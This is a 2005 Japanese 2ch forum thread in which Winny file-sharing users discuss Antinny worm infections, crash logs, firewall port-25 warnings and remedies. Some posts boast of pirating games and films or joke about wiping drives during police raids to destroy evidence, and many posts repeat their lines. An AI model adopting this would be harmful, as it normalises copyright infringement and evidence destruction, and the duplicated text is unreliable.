!! :/イ::::∧ ``丶 ` / }ノ j!:l::!``ヽ´___!:::: | / l l
|//:l::::/ ハ>―-、`ト-,--‐ '|| ´ ´l::l::l _}ヽ |:::::: |``丶、 / l |
..::/::::::l::/r '´ \,.ゝ-―||<´l:::!::!´ ̄ イ__ !::::::.l! \ニ_―--'、 !
:/ :::::::!::! ! ,>‐-、 / ヾ、 `|::|::|-―-,=' !|:::::::|:l \`ヽ、 `ヽ、 |
'ヽ::::::|l::トゝ' { ァ──-ト|::!:::!ニ_´ / |::!:::::!:', \ `` `丶l
ニ=ヽ:!:l:!::Y´ ヽ/ |!l::!!:::! / l::l:l::::!::゙、 丶、 `
―--|:,ゝ' /く ノノ,!:!゙、:', l/ ヽ l::l::',::ヽ::ヽ ``
ニ=-‐/ / / -=´'´/ ヾ、ヽヽ ヽ ヽ l::l::ヽ:::::::::ヽ
:::::::::::{ _, '´ / / }〉 ヽヽ 〉 ゙、ヽ::ヽ:::::::::ヽ
=-‐_'∧ ヽ // \\--‐'´ヽヽ::丶、::::::\‐--------―‐
 ̄ ` ー--‐ '´ ̄ ヽ、\ _,,>ー―‐'-`-`--‐丶\:::::::::`丶、`丶、
367 :[名無し]さん(bin+cue).rar:05/01/05 12:56:22 ID:InAtQhBZ
京都府警と北海道警は年末の処分で過去の汚点を清算したつもり
らしいから、そろそろ民間人タイーホが出てきてもおかしくないかも。
‥‥とそこいら中で言っておけば、ちっとは発病接続が減るかも。
仙台があのままで終了するとは思えないし、今後さらにパワーア
ップしたのが出てきても不思議じゃない。
らしいから、そろそろ民間人タイーホが出てきてもおかしくないかも。
‥‥とそこいら中で言っておけば、ちっとは発病接続が減るかも。
仙台があのままで終了するとは思えないし、今後さらにパワーア
ップしたのが出てきても不思議じゃない。
368 :[名無し]さん(bin+cue).rar:05/01/05 13:59:24 ID:42ksM8Yt
Winnyを使って著作権を侵害するようなコピーをしたことはない
369 :[名無し]さん(bin+cue).rar:05/01/05 14:21:26 ID:AjIDW3FL
まぁどうやらWinny使うだけなら問題ないみたいだし
370 :[名無し]さん(bin+cue).rar:05/01/05 14:32:04 ID:7cP5iCaD
問題ないと言い切れるのは警察の中のひとだけだよ。
371 :[名無し]さん(bin+cue).rar:05/01/05 14:37:37 ID:cVy5U0o3
>>370
うまい!
うまい!
372 :[名無し]さん(bin+cue).rar:05/01/05 15:55:54 ID:UX7x6nz3
次はバックドアとキーロガー付きのような気がする
373 :[名無し]さん(bin+cue).rar:05/01/05 18:59:13 ID:Y6ZM761T
それよりオラビックリしたぞ、亀仙人のジッちゃんからもらったWinnyってアイテム、
ネットに繋いでおくだけで、いろんなゲームやアプリがタダで手に入るんだ。
ドラゴンボール集めてるよりずっとおもしれぇーぞ!
公開前の映画まで流れてるんだから、ホントたまげたよなぁ〜
いつも落としてばかりじゃ悪いから、オラもファイルをアップするぞ!
まだまだWinny初心者だけど、これからもじゃんじゃんアップするから、
オラにみんなのファイルを分けてくれ!
ネットに繋いでおくだけで、いろんなゲームやアプリがタダで手に入るんだ。
ドラゴンボール集めてるよりずっとおもしれぇーぞ!
公開前の映画まで流れてるんだから、ホントたまげたよなぁ〜
いつも落としてばかりじゃ悪いから、オラもファイルをアップするぞ!
まだまだWinny初心者だけど、これからもじゃんじゃんアップするから、
オラにみんなのファイルを分けてくれ!
374 :[名無し]さん(bin+cue).rar:05/01/05 19:02:42 ID:zfPsdPvX
踏み込まれた瞬間に、HDD破壊すればいいみたいだしね。
普通にバックドア+キーロガだと、踏んでも気付かないだろうね
でも、それだとなぁ。別にnyでなくても、いろいろあるし
普通にバックドア+キーロガだと、踏んでも気付かないだろうね
でも、それだとなぁ。別にnyでなくても、いろいろあるし
375 :[名無し]さん(bin+cue).rar:05/01/05 19:04:59 ID:FXsB0zZx
キンタマはny使用者に感染してたが、
ny使ってない人に無理やりnyをインストしてキンタマ状態にするウイルスが出たら恐ろしいな
ny使ってない人に無理やりnyをインストしてキンタマ状態にするウイルスが出たら恐ろしいな
376 :[名無し]さん(bin+cue).rar:05/01/05 19:08:40 ID:AjIDW3FL
それだったら全く関係ないPCにキャッシュの転送をさせるほうがとっても良いと
377 :[名無し]さん(bin+cue).rar:05/01/05 23:03:08 ID:xv+JZL7C
踏み込まれてからじゃ、証拠隠滅に問われるぞw。おそらく「証拠隠滅の故意なし」で区別するつもりだろうから。
378 :[名無し]さん(bin+cue).rar:05/01/05 23:07:07 ID:HlEoYZe5
りょうくんの場合は、証拠隠滅の猶予時間が特別に与えられてた
からな(w。
からな(w。
379 :[名無し]さん(bin+cue).rar:05/01/05 23:12:49 ID:iz6JTc6+
スプリンターセルとかいうゲームやってみ
PCを証拠隠滅してるシーンとかあるから。
PCを証拠隠滅してるシーンとかあるから。
380 :[名無し]さん(bin+cue).rar:05/01/06 00:10:06 ID:bFf6Cf9J
そしてそのシーンと同時にHDDをフォーマットするウィルス
ガクガクブルブル
ガクガクブルブル
381 :[名無し]さん(bin+cue).rar:05/01/06 00:59:40 ID:yZBrkzDG
踏み込まれた瞬間にホワイター発動ってのは?
382 :[名無し]さん(bin+cue).rar:05/01/06 07:24:15 ID:/qM55Wfh
新種のウイルスが見つかったよ。
これは・・マジでやばいわ 仕掛けの立ちが悪いけど、画像もグロいし
気おつけて・・・・・。
これは・・マジでやばいわ 仕掛けの立ちが悪いけど、画像もグロいし
気おつけて・・・・・。
383 :[名無し]さん(bin+cue).rar:05/01/06 07:40:27 ID:uWFjuONa
熊ーAA(略
384 :[名無し]さん(bin+cue).rar:05/01/06 09:41:18 ID:WiCX9ERL
☆補足
「ファイル名を指定して実行」で「c:\windows\win.ini」をあける。
「ぬるぽ」とはいっていればワームにやられてます。
こいつに感染しました。とりあえずWinnyは切りました。
これからどうすればいいでしょう。
「ファイル名を指定して実行」で「c:\windows\win.ini」をあける。
「ぬるぽ」とはいっていればワームにやられてます。
こいつに感染しました。とりあえずWinnyは切りました。
これからどうすればいいでしょう。
385 :[名無し]さん(bin+cue).rar:05/01/06 09:50:56 ID:8IQJe5jN
すべての書き込みメディア初期化&リカバリー実行。
386 :[名無し]さん(bin+cue).rar:05/01/06 09:56:00 ID:l08jQ22n
osクリインスコしとけ
387 :384:05/01/06 09:59:26 ID:WiCX9ERL
工エエェェ(´д`)ェェエエ工工
win.ini内を書き換えるだけじゃだめですか?
ぬるぽウィルスにみられるような、Upフォルダも生成されてないし、
ノートン先生にもまったくなにもひっかからないし、
もちろんexeを踏んだこともないんですが。
exeで検索してみても、偽装ファイルは見つかりませんでした。
win.ini内を書き換えるだけじゃだめですか?
ぬるぽウィルスにみられるような、Upフォルダも生成されてないし、
ノートン先生にもまったくなにもひっかからないし、
もちろんexeを踏んだこともないんですが。
exeで検索してみても、偽装ファイルは見つかりませんでした。
388 :[名無し]さん(bin+cue).rar:05/01/06 10:13:07 ID:8IQJe5jN
>>387
テンプレまとめ ttp://www.geocities.jp/kemkzuenc/Antinny.html
Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/
リカバリがいやなら、これを熟読して完璧に実行しろ。
テンプレまとめ ttp://www.geocities.jp/kemkzuenc/Antinny.html
Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/
リカバリがいやなら、これを熟読して完璧に実行しろ。
389 :[名無し]さん(bin+cue).rar:05/01/06 12:23:54 ID:tQm5qvSf
Down フォルダを開くとメモリがフル稼働になってPCが異常におそくなります。
これって何かのウィルスにやられてますか?
これって何かのウィルスにやられてますか?
390 :[名無し]さん(bin+cue).rar:05/01/06 12:34:45 ID:yZBrkzDG
>>389
1を読め、そしてそのファイルがaviなら首をつれ。
1を読め、そしてそのファイルがaviなら首をつれ。
391 :[名無し]さん(bin+cue).rar:05/01/06 15:47:44 ID:ume+9N6m
【使用OS】 Windows2000sp4
【WindowsUpdateしてるか】 しています
【AntiVirusは】 ウイルスバスター2004
【ちゃんとUpdateしてるか】 しています
【スキャンした結果】 即削除したため憶えてないが、19個くらい感知
【Winnyのバージョン】 Ver2.0β7.1
【Winny歴、総DL量は】 1年位 150GB
【テンプレを読んだか】 読みました
【症状か具体的に、分かる限りすべて書く】
通常は問題なく使用できますが、
ネット接続すると、やたらネットワークウイルスを感知し、
ブルーバックの画面に以下のメッセージが出てきてフリーズ状態になってしまいます。
*** STOP : 0x000000D1 (0xE31D5040,0x00000001,0xDCEDEDB9)
DRIVER_IRQL_NOT_LESS_OR_EQUAL
*** Address BCEDEDB9 base at BCEDA000, DateStamp 3ecd5361 - mrxsmb.sys
Beginning dump of physical memory
【何をしたらそんなことになったのか】 AntiVirusを切断した状態で使用してました・・・。
【これまでにとった措置】 エラーメッセージの意味が分からずどうしたらよいものやら・・・
諦めてOSをクリーンインストールしようと思ってますが、
どの様な症状なのかだけでも知りたくて初心者板にいくか迷いましたが、書きこませていただきました。
どなたかご伝授願います。
【WindowsUpdateしてるか】 しています
【AntiVirusは】 ウイルスバスター2004
【ちゃんとUpdateしてるか】 しています
【スキャンした結果】 即削除したため憶えてないが、19個くらい感知
【Winnyのバージョン】 Ver2.0β7.1
【Winny歴、総DL量は】 1年位 150GB
【テンプレを読んだか】 読みました
【症状か具体的に、分かる限りすべて書く】
通常は問題なく使用できますが、
ネット接続すると、やたらネットワークウイルスを感知し、
ブルーバックの画面に以下のメッセージが出てきてフリーズ状態になってしまいます。
*** STOP : 0x000000D1 (0xE31D5040,0x00000001,0xDCEDEDB9)
DRIVER_IRQL_NOT_LESS_OR_EQUAL
*** Address BCEDEDB9 base at BCEDA000, DateStamp 3ecd5361 - mrxsmb.sys
Beginning dump of physical memory
【何をしたらそんなことになったのか】 AntiVirusを切断した状態で使用してました・・・。
【これまでにとった措置】 エラーメッセージの意味が分からずどうしたらよいものやら・・・
諦めてOSをクリーンインストールしようと思ってますが、
どの様な症状なのかだけでも知りたくて初心者板にいくか迷いましたが、書きこませていただきました。
どなたかご伝授願います。
392 :[名無し]さん(bin+cue).rar:05/01/06 15:57:06 ID:blRWgrmu
AntiVirusのレポート見ればどんなウィルスだったか載ってるだろ?
393 :[名無し]さん(bin+cue).rar:05/01/06 16:51:59 ID:EiYut4Xc
レス有り難うございます。
>>392
レポート見逃してました。
職場からなんで自宅で再確認してみます。
>>393
それでは破損しているドライバを探して
入れ直せば治るということですか?
番地外でしたら失礼します。
>>392
レポート見逃してました。
職場からなんで自宅で再確認してみます。
>>393
それでは破損しているドライバを探して
入れ直せば治るということですか?
番地外でしたら失礼します。
>>394
SP4の導入。
ttp://support.microsoft.com/default.aspx?scid=kb;ja;816036
手っ取り早く修復するならSP4アンインスコ。ただ前のSP3アーカイブしてないのなら下のアド参照
ttp://www.microsoft.com/japan/technet/security/bulletin/ms04-044.asp
+技術的な詳細
+脆弱性の詳細
-セキュリティ更新プログラムに関する情報
|
+Windows Server 2003
+Windows XP
-Windows 2000
|
ファイルに関する情報
mrxsmb.sys 5.00.2195.6994 2004/11/01 14:24 409,424
自己責任でヨロ
SP4の導入。
ttp://support.microsoft.com/default.aspx?scid=kb;ja;816036
手っ取り早く修復するならSP4アンインスコ。ただ前のSP3アーカイブしてないのなら下のアド参照
ttp://www.microsoft.com/japan/technet/security/bulletin/ms04-044.asp
+技術的な詳細
+脆弱性の詳細
-セキュリティ更新プログラムに関する情報
|
+Windows Server 2003
+Windows XP
-Windows 2000
|
ファイルに関する情報
mrxsmb.sys 5.00.2195.6994 2004/11/01 14:24 409,424
自己責任でヨロ
396 :[名無し]さん(bin+cue).rar:05/01/06 18:58:53 ID:uZDykNrB
397 :[名無し]さん(bin+cue).rar:05/01/06 19:21:40 ID:sDeLRea7
398 :[名無し]さん(bin+cue).rar:05/01/06 20:06:15 ID:irKuz4QE
【Autorun+bat】は、なぜ
あまりアンチウイルスソフトは役に立たない。のですか???
あまりアンチウイルスソフトは役に立たない。のですか???
399 :[名無し]さん(bin+cue).rar:05/01/06 21:38:25 ID:OLSa58j/
ぶっちゃけ今も被害続出?なんとかしたほうがいい状態?
WinnyやP2Pが今どれだけ使われているかってのも謎なんだが。
WinnyやP2Pが今どれだけ使われているかってのも謎なんだが。
400 :[名無し]さん(bin+cue).rar:05/01/07 03:15:44 ID:b89ZBpX0
401 :[名無し]さん(bin+cue).rar:05/01/07 07:40:44 ID:yIQ8pca3
パソコンが起動できなくなりました。
別のPCからカキコしてます。
英語がでています。
別のPCからカキコしてます。
英語がでています。
402 :[名無し]さん(bin+cue).rar:05/01/07 07:45:49 ID:FolC3jsz
英語でやさしく話しかけてあげましょう
403 :[名無し]さん(bin+cue).rar:05/01/07 07:48:33 ID:TZQn8F1g
すみません、外付けのフロッピーのディスクを抜いて、
エンター押したら起動しました。驚きました。
朝からおさわがせしました^^;
エンター押したら起動しました。驚きました。
朝からおさわがせしました^^;
405 :[名無し]さん(bin+cue).rar:05/01/07 08:13:04 ID:iysiJnr1
406 :[名無し]さん(bin+cue).rar:05/01/07 10:46:49 ID:D/CQD73M
かんべんしてくれ。
407 :[名無し]さん(bin+cue).rar:05/01/07 16:58:49 ID:sTrnAqVK
>>404
通報しといた
通報しといた
408 :[名無し]さん(bin+cue).rar:05/01/07 19:50:53 ID:Cn1n81xk
409 :[名無し]さん(bin+cue).rar:05/01/07 21:37:31 ID:FUK9eg2O
410 :[名無し]さん(bin+cue).rar:05/01/07 23:37:17 ID:ZFDFjueT
>404
まぁここまで間抜けだと可愛げすらあるな。
まぁここまで間抜けだと可愛げすらあるな。
411 :[名無し]さん(bin+cue).rar:05/01/07 23:42:00 ID:ykYuLX/W
うるせーはげ
412 :[名無し]さん(bin+cue).rar:05/01/08 00:13:53 ID:nyBrXVej
(\
\\
(\\
\\\
(\\\\
(\\\\\
\\ |||
( ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\ | ⊂⊃
 ̄ ̄( ̄ ̄//// ̄\ ∧ ∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ̄(//// ̄\\( ゜Д゜) < 氏ねやカス共 ゴルァ !!
".;": (/(/// ̄(つ つ \_____________
".;": (/(/| \\
.;".;": ..;".;;: (/((/ ∧|\\ .;".;": ..;.;".;
.;".;": .. ; ∪ ∪ \\ .;".;": ..;.;".
.;".;" .;".; \\
ゴ オ ォ ォ …… ! ! \\ ;": ..;.;".;":
.;".;": _.;.;__ \\ ド カ ァ ン !
.;".;": ..;.;".; ζ /_.;_/| .;>>404_ \\ .;".;.;".;":
.;".;": ..;.;".;": ;:'.;| ΓΓ | |;":从へ_/| \\.;".;"_.;__..:
从へ从へへ从 ; ζ | Γ从 | |;:.. |从Γ | | \\ ∠___/|
( ⌒( ⌒ ) ζ | 从Γ | |.:;. |从Γζ.;"._ \\|ΓΓΓ| |
( ⌒ ⌒ ⌒ ); | ΓΓ | |.;;::|ΓΓ | | ( 从へ;: |从ΓΓ| |
Σ( ⌒( ⌒ ) ζ ( ( ) )⌒ ) ( 从へ从)_.;;:.;|Γ从Γ| |
( (( ( ⌒ )) ) 从 Σ( ⌒( 从へ从) ∠___/|
Σ (( ( ⌒ )) ) )(( ⌒ ( 从へ从) .;".;:;|ΓΓΓ| |
(( ⌒ ( ( ) )⌒ );:; .;".;": ..;.;".;":|从ΓΓ| |
\\
(\\
\\\
(\\\\
(\\\\\
\\ |||
( ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\ | ⊂⊃
 ̄ ̄( ̄ ̄//// ̄\ ∧ ∧ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ̄(//// ̄\\( ゜Д゜) < 氏ねやカス共 ゴルァ !!
".;": (/(/// ̄(つ つ \_____________
".;": (/(/| \\
.;".;": ..;".;;: (/((/ ∧|\\ .;".;": ..;.;".;
.;".;": .. ; ∪ ∪ \\ .;".;": ..;.;".
.;".;" .;".; \\
ゴ オ ォ ォ …… ! ! \\ ;": ..;.;".;":
.;".;": _.;.;__ \\ ド カ ァ ン !
.;".;": ..;.;".; ζ /_.;_/| .;>>404_ \\ .;".;.;".;":
.;".;": ..;.;".;": ;:'.;| ΓΓ | |;":从へ_/| \\.;".;"_.;__..:
从へ从へへ从 ; ζ | Γ从 | |;:.. |从Γ | | \\ ∠___/|
( ⌒( ⌒ ) ζ | 从Γ | |.:;. |从Γζ.;"._ \\|ΓΓΓ| |
( ⌒ ⌒ ⌒ ); | ΓΓ | |.;;::|ΓΓ | | ( 从へ;: |从ΓΓ| |
Σ( ⌒( ⌒ ) ζ ( ( ) )⌒ ) ( 从へ从)_.;;:.;|Γ从Γ| |
( (( ( ⌒ )) ) 从 Σ( ⌒( 从へ从) ∠___/|
Σ (( ( ⌒ )) ) )(( ⌒ ( 从へ从) .;".;:;|ΓΓΓ| |
(( ⌒ ( ( ) )⌒ );:; .;".;": ..;.;".;":|从ΓΓ| |
413 :[名無し]さん(bin+cue).rar:05/01/08 07:55:29 ID:OO4Yw5GI
>>408
通報しました
通報しました
414 :[名無し]さん(bin+cue).rar:05/01/08 08:26:05 ID:X/49QlnS
ZIP等で固められたファイルはほとんど.exe付きだわ…。
415 :[名無し]さん(bin+cue).rar:05/01/08 08:56:36 ID:tTni9/3V
LZHのほうが圧倒的に.exe率高い
(まぁ画像ダウンしているアホにしか分からないか・・・)
(まぁ画像ダウンしているアホにしか分からないか・・・)
416 :うさだ萌え ◆HkEgRy0Iso :05/01/08 09:57:18 ID:0gWsa2id
417 :ひみつの文字列さん:2024/12/18(水) 20:55:08 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
418 :[名無し]さん(bin+cue).rar:05/01/08 11:55:33 ID:ZioAI04B
419 :[名無し]さん(bin+cue).rar:05/01/08 12:00:47 ID:Rhv9ZUqi
>>417
スレタイトルを百万回音読してこい。
スレタイトルを百万回音読してこい。
420 :[名無し]さん(bin+cue).rar:05/01/08 12:32:41 ID:ChXqf9q+
nyやってる友人から、画面にドクロマークが表示されてネットにつながらなくなったと言われたんですがこんなウイルス
ありますかね?
普通に起動はするんですが。
ありますかね?
普通に起動はするんですが。
421 :[名無し]さん(bin+cue).rar:05/01/08 12:34:49 ID:ZW6ayss8
ドクロストーンの入手に失敗したんだと思う。
422 :[名無し]さん(bin+cue).rar:05/01/08 12:59:33 ID:BmalyunT
おしおきだべ〜〜〜〜〜w
423 :[名無し]さん(bin+cue).rar:05/01/08 15:36:13 ID:Z23HQ0kW
また友人の話か!
424 :[名無し]さん(bin+cue).rar:05/01/08 17:25:18 ID:61PCCGGm
>>423
419はネットに書き込んでるんだから、友人であってる
419はネットに書き込んでるんだから、友人であってる
425 :[名無し]さん(bin+cue).rar:05/01/08 17:51:28 ID:Rhv9ZUqi
サブ機を持ってるとか携帯からとか、友人を語ってもいくらでも
書き込める。まあなんにせよ、自業自得だから初期化リカバリし
ておけって感じ。
書き込める。まあなんにせよ、自業自得だから初期化リカバリし
ておけって感じ。
426 :[名無し]さん(bin+cue).rar:05/01/08 19:27:30 ID:yMD5mhn6
ドクロのウイルスってこれか?
http://www.sophos.co.jp/images/viruses/phantom1.gif
ウイルス
Phantom 1
これ、Winnyでかかるのか?めずらしいな。
http://www.sophos.co.jp/images/viruses/phantom1.gif
ウイルス
Phantom 1
これ、Winnyでかかるのか?めずらしいな。
427 :[名無し]さん(bin+cue).rar:05/01/08 21:22:14 ID:/TzIjd8o
これか?じゃねーよ
428 :[名無し]さん(bin+cue).rar:05/01/08 22:03:22 ID:Wc9cCUnU
Windows Media Playerアイコンのexeファイル踏んでもうた。
C:\Program Files\messenger\tempに壊れたmp3ファイルを作り実行しWMPはエラー表示。
ネットは切ってたから良かった。
C:\Program Files\messenger\ に
messenger_autorun.exe
作られてmessenger_autorun.exeがrunに新しく登録されていた。
レジストリを前日バックアップに復帰させやばそうなファイルは削除。
トレンドマイクロでウィルスチェックしたらWORM_ANTINNY.Cとなってたんだが、
WORM_ANTINNY.C説明にはtxtを実行って書いてあったから、亜種かな?
C:\Program Files\messenger\tempに壊れたmp3ファイルを作り実行しWMPはエラー表示。
ネットは切ってたから良かった。
C:\Program Files\messenger\ に
messenger_autorun.exe
作られてmessenger_autorun.exeがrunに新しく登録されていた。
レジストリを前日バックアップに復帰させやばそうなファイルは削除。
トレンドマイクロでウィルスチェックしたらWORM_ANTINNY.Cとなってたんだが、
WORM_ANTINNY.C説明にはtxtを実行って書いてあったから、亜種かな?
429 :[名無し]さん(bin+cue).rar:05/01/08 23:59:12 ID:/8d8NcUX
トレンドのWORM_ANTINNY.Cとは明らかに挙動が違うが
やってること(ダミーを実行して、裏でワーム活動)は
似てるので、亜種というより変種というべきかな。
やってること(ダミーを実行して、裏でワーム活動)は
似てるので、亜種というより変種というべきかな。
430 :[名無し]さん(bin+cue).rar:05/01/09 07:17:49 ID:nWycPXSp
OSはXP
ガンダム動画をダウンしたらなぜかRARファイルが・・。
トレンドマイクロのウイルスチェックしたらANTINNY.Aが。
でさっさとRARを消そうとマウスをあわして右クリックして削除
えらぼうとしたとき、クシャミしてまちがって左ダブルクリックしてしまい
「このファイルは壊れています・・」に、なんかCPUの動作の音が、
反射的に電源ボタンずっとおして強制的に電源きった。
でまた起動して、Winny,RARはファイルはすてて、Cドライブをスキャンしたら
無反応、レジストリともみたけど、大丈夫だと思う。大丈夫ですよね?
ガンダム動画をダウンしたらなぜかRARファイルが・・。
トレンドマイクロのウイルスチェックしたらANTINNY.Aが。
でさっさとRARを消そうとマウスをあわして右クリックして削除
えらぼうとしたとき、クシャミしてまちがって左ダブルクリックしてしまい
「このファイルは壊れています・・」に、なんかCPUの動作の音が、
反射的に電源ボタンずっとおして強制的に電源きった。
でまた起動して、Winny,RARはファイルはすてて、Cドライブをスキャンしたら
無反応、レジストリともみたけど、大丈夫だと思う。大丈夫ですよね?
431 :[名無し]さん(bin+cue).rar:05/01/09 07:23:23 ID:nWycPXSp
>>Winny,RARはファイルはすてて
RARファイルをWinnyごと削除したって事です。そのあとCドライブを
スキャンしました。
サービスパック2はインストール済み。
RARファイルをWinnyごと削除したって事です。そのあとCドライブを
スキャンしました。
サービスパック2はインストール済み。
432 :[名無し]さん(bin+cue).rar:05/01/09 07:40:26 ID:84KaI4tP
>>430-431
RARを何の解凍ツールに関連付けてるのか知らんが、
ダブルクリックしたのが本当にRAR圧縮のファイルで、
それがメッセージの通り解凍ツールで破損と判断されて
解凍できなかったなら感染以前の問題
よって未感染だから大丈夫だと思う
落ち着いて考えて自分で判断するようにして欲しい
何も考えずにこういう書き込みをすると、
「このファイルは壊れています云々」というウィンドウを開いて偽装する亜種が
出てきたりするきっかけになったりする
RARを何の解凍ツールに関連付けてるのか知らんが、
ダブルクリックしたのが本当にRAR圧縮のファイルで、
それがメッセージの通り解凍ツールで破損と判断されて
解凍できなかったなら感染以前の問題
よって未感染だから大丈夫だと思う
落ち着いて考えて自分で判断するようにして欲しい
何も考えずにこういう書き込みをすると、
「このファイルは壊れています云々」というウィンドウを開いて偽装する亜種が
出てきたりするきっかけになったりする
433 :[名無し]さん(bin+cue).rar:05/01/09 11:37:50 ID:IoKwQXhh
>>430
あわてて、怪しげなファイルを削除するなんてのは愚の骨頂。
ちゃんとプロセス止めてから、詳細をチェックしないと何されてるか分からん
ANTINNY.Aはいわゆる“ぬるぽ”なんだが、win.iniとかもチェックしたのか?
しかもANTINNY.Aと検出される亜種もいくつかあるから、分からんよ。
あわてて、怪しげなファイルを削除するなんてのは愚の骨頂。
ちゃんとプロセス止めてから、詳細をチェックしないと何されてるか分からん
ANTINNY.Aはいわゆる“ぬるぽ”なんだが、win.iniとかもチェックしたのか?
しかもANTINNY.Aと検出される亜種もいくつかあるから、分からんよ。
434 :ひみつの文字列さん:2024/12/18(水) 20:55:08 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
435 :[名無し]さん(bin+cue).rar:05/01/10 01:03:51 ID:McOWlPoE
一足遅かったか・・・・orz
あげとこ
あげとこ
436 :[名無し]さん(bin+cue).rar:05/01/10 01:08:40 ID:4vFlW1zI
>反射的に電源ボタンずっとおして強制的に電源きった。
こっちのほうが感染するより不味いと思うが。
こっちのほうが感染するより不味いと思うが。
437 :[名無し]さん(bin+cue).rar:05/01/10 01:38:55 ID:33GDe7Q4
ラストクリスマス
438 :[名無し]さん(bin+cue).rar:05/01/10 08:26:24 ID:EqFwiaaE
落としたファイルが全部破損する…
ダウソフォルダを空にしても126kbなぜかあるし
ウイルススキャンも効かないし
ダウソフォルダを空にしても126kbなぜかあるし
ウイルススキャンも効かないし
439 :[名無し]さん(bin+cue).rar:05/01/10 08:37:28 ID:v8JRSLLW
>>438
HDDがぶっ壊れたんじゃね?
HDDがぶっ壊れたんじゃね?
440 :[名無し]さん(bin+cue).rar:05/01/10 19:06:53 ID:PRChvvD5
>>7の「WinnyFileDatabase」がどうやら消えてしまっているようなのですが、
どこへ行ったら見ることができるんですか?
どこへ行ったら見ることができるんですか?
441 :[名無し]さん(bin+cue).rar:05/01/10 19:22:06 ID:/KbXTKzf
>>440
上の方に同じような質問がたしかあった
上の方に同じような質問がたしかあった
442 :[名無し]さん(bin+cue).rar:05/01/10 20:27:09 ID:Kr12yDlz
先月、ウイルスバスター2005を入れたのですが
winny起動中に突然バスターが、winnyがポート25にアクセスしようとしてます。
と警告してきたので、パーソナルファイアウォールログを見たら
アプリケーションパス winny.exe
説明 マスメール送信(SMTP)
となっていました。
ウイルス検索しても何も検出されなかったのですが
これはウイルス感染しているのでしょうか?
winny起動中に突然バスターが、winnyがポート25にアクセスしようとしてます。
と警告してきたので、パーソナルファイアウォールログを見たら
アプリケーションパス winny.exe
説明 マスメール送信(SMTP)
となっていました。
ウイルス検索しても何も検出されなかったのですが
これはウイルス感染しているのでしょうか?
443 :[名無し]さん(bin+cue).rar:05/01/10 20:42:10 ID:/OnlV8w9
・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・
444 :[名無し]さん(bin+cue).rar:05/01/10 20:43:25 ID:9LLXSPV1
>>442
Winnyに設定してあるポートが25番なんてアホなことはねぇよな?
Winnyに設定してあるポートが25番なんてアホなことはねぇよな?
445 :[名無し]さん(bin+cue).rar:05/01/10 20:50:17 ID:/g9KMJml
正真正銘のアホだな
いや、さすがにそれはないです。
SMTPのポート番号であるというのはわかるのですが
なんでそれにアクセスしようとするのかがわからないのです。
SMTPのポート番号であるというのはわかるのですが
なんでそれにアクセスしようとするのかがわからないのです。
447 :[名無し]さん(bin+cue).rar:05/01/10 20:52:04 ID:KZOxcX/w
変種Winnyとか妙なパッチ当てしたやつとか使ってないよな。
safenyなら使ってるのですが・・・
449 :[名無し]さん(bin+cue).rar:05/01/10 21:27:12 ID:9LLXSPV1
450 :[名無し]さん(bin+cue).rar:05/01/10 21:41:58 ID:t7z3hh1+
俺も興味出てきた、nyのVerを詳しく
いわゆるUp0のクラック版とかには、メール砲発射機能を持つものもあったが
いわゆるUp0のクラック版とかには、メール砲発射機能を持つものもあったが
451 : ◆497839762w :05/01/10 21:43:37 ID:V+TWJ5ew
質問スレでテンプレに追加予定です。
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
●「メールを送信しようとしている」「外部の25番ポートに接続しようとしている」等とFWが警告します。
→接続先のノードがAcceptポート番号に本来メール用の25番を設定しているだけです。Winny.exeの
サイズ、パス等に異常がなければ特に問題はありません。が、接続は拒否しておくのが無難です。
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
http://winny.info/2ch/qa/1069664449.html#96 以降を参考に
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
●「メールを送信しようとしている」「外部の25番ポートに接続しようとしている」等とFWが警告します。
→接続先のノードがAcceptポート番号に本来メール用の25番を設定しているだけです。Winny.exeの
サイズ、パス等に異常がなければ特に問題はありません。が、接続は拒否しておくのが無難です。
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
http://winny.info/2ch/qa/1069664449.html#96 以降を参考に
452 :[名無し]さん(bin+cue).rar:05/01/10 22:20:41 ID:t7z3hh1+
そうか、それだけなのか…
1024ポート以下のアウトバウンドは全部閉じてるから気付かなかったYO
(いやまぁ、今は80ぐらいは開けてるわけだが)
使うなら49152〜65535にしてくれよぅ…
1024ポート以下のアウトバウンドは全部閉じてるから気付かなかったYO
(いやまぁ、今は80ぐらいは開けてるわけだが)
使うなら49152〜65535にしてくれよぅ…
453 :[名無し]さん(bin+cue).rar:05/01/11 00:44:16 ID:sljUj0Ar
ネトゲのポート使ってりゃいいのに、
たまに変なポートを使う奴がいるからな。
たまに変なポートを使う奴がいるからな。
455 :[名無し]さん(bin+cue).rar:05/01/11 12:20:58 ID:GOjWiGmf
うーん、俺 20 番使ってるけど変えるべき?
456 :[名無し]さん(bin+cue).rar:05/01/11 12:59:57 ID:PlopXAXS
>>455
Wellknownポートはやめておいたほうがいいと思われ。
Wellknownポートはやめておいたほうがいいと思われ。
457 :[名無し]さん(bin+cue).rar:05/01/11 13:47:23 ID:GOjWiGmf
でもさー。WellKnown でなかったら一々変えないと
ログ見ただけで怪しいってモロバレじゃん?
その度にルータの設定も変えるの面倒いよ…。
ログ見ただけで怪しいってモロバレじゃん?
その度にルータの設定も変えるの面倒いよ…。
458 :[名無し]さん(bin+cue).rar:05/01/11 13:55:34 ID:FY667Vks
>>457
だったら最初から質問するな
だったら最初から質問するな
459 :[名無し]さん(bin+cue).rar:05/01/11 13:57:17 ID:WhzBfQ/e
r -、,, - 、 クマ−
__ ヽ/ ヽ__
,"- `ヽ, / ● l )
/ ● \__ (● ● i"
__/ ●)  ̄ )"__ "`;
.(_i ● ' __, '"  ̄`'(___/.i⌒i
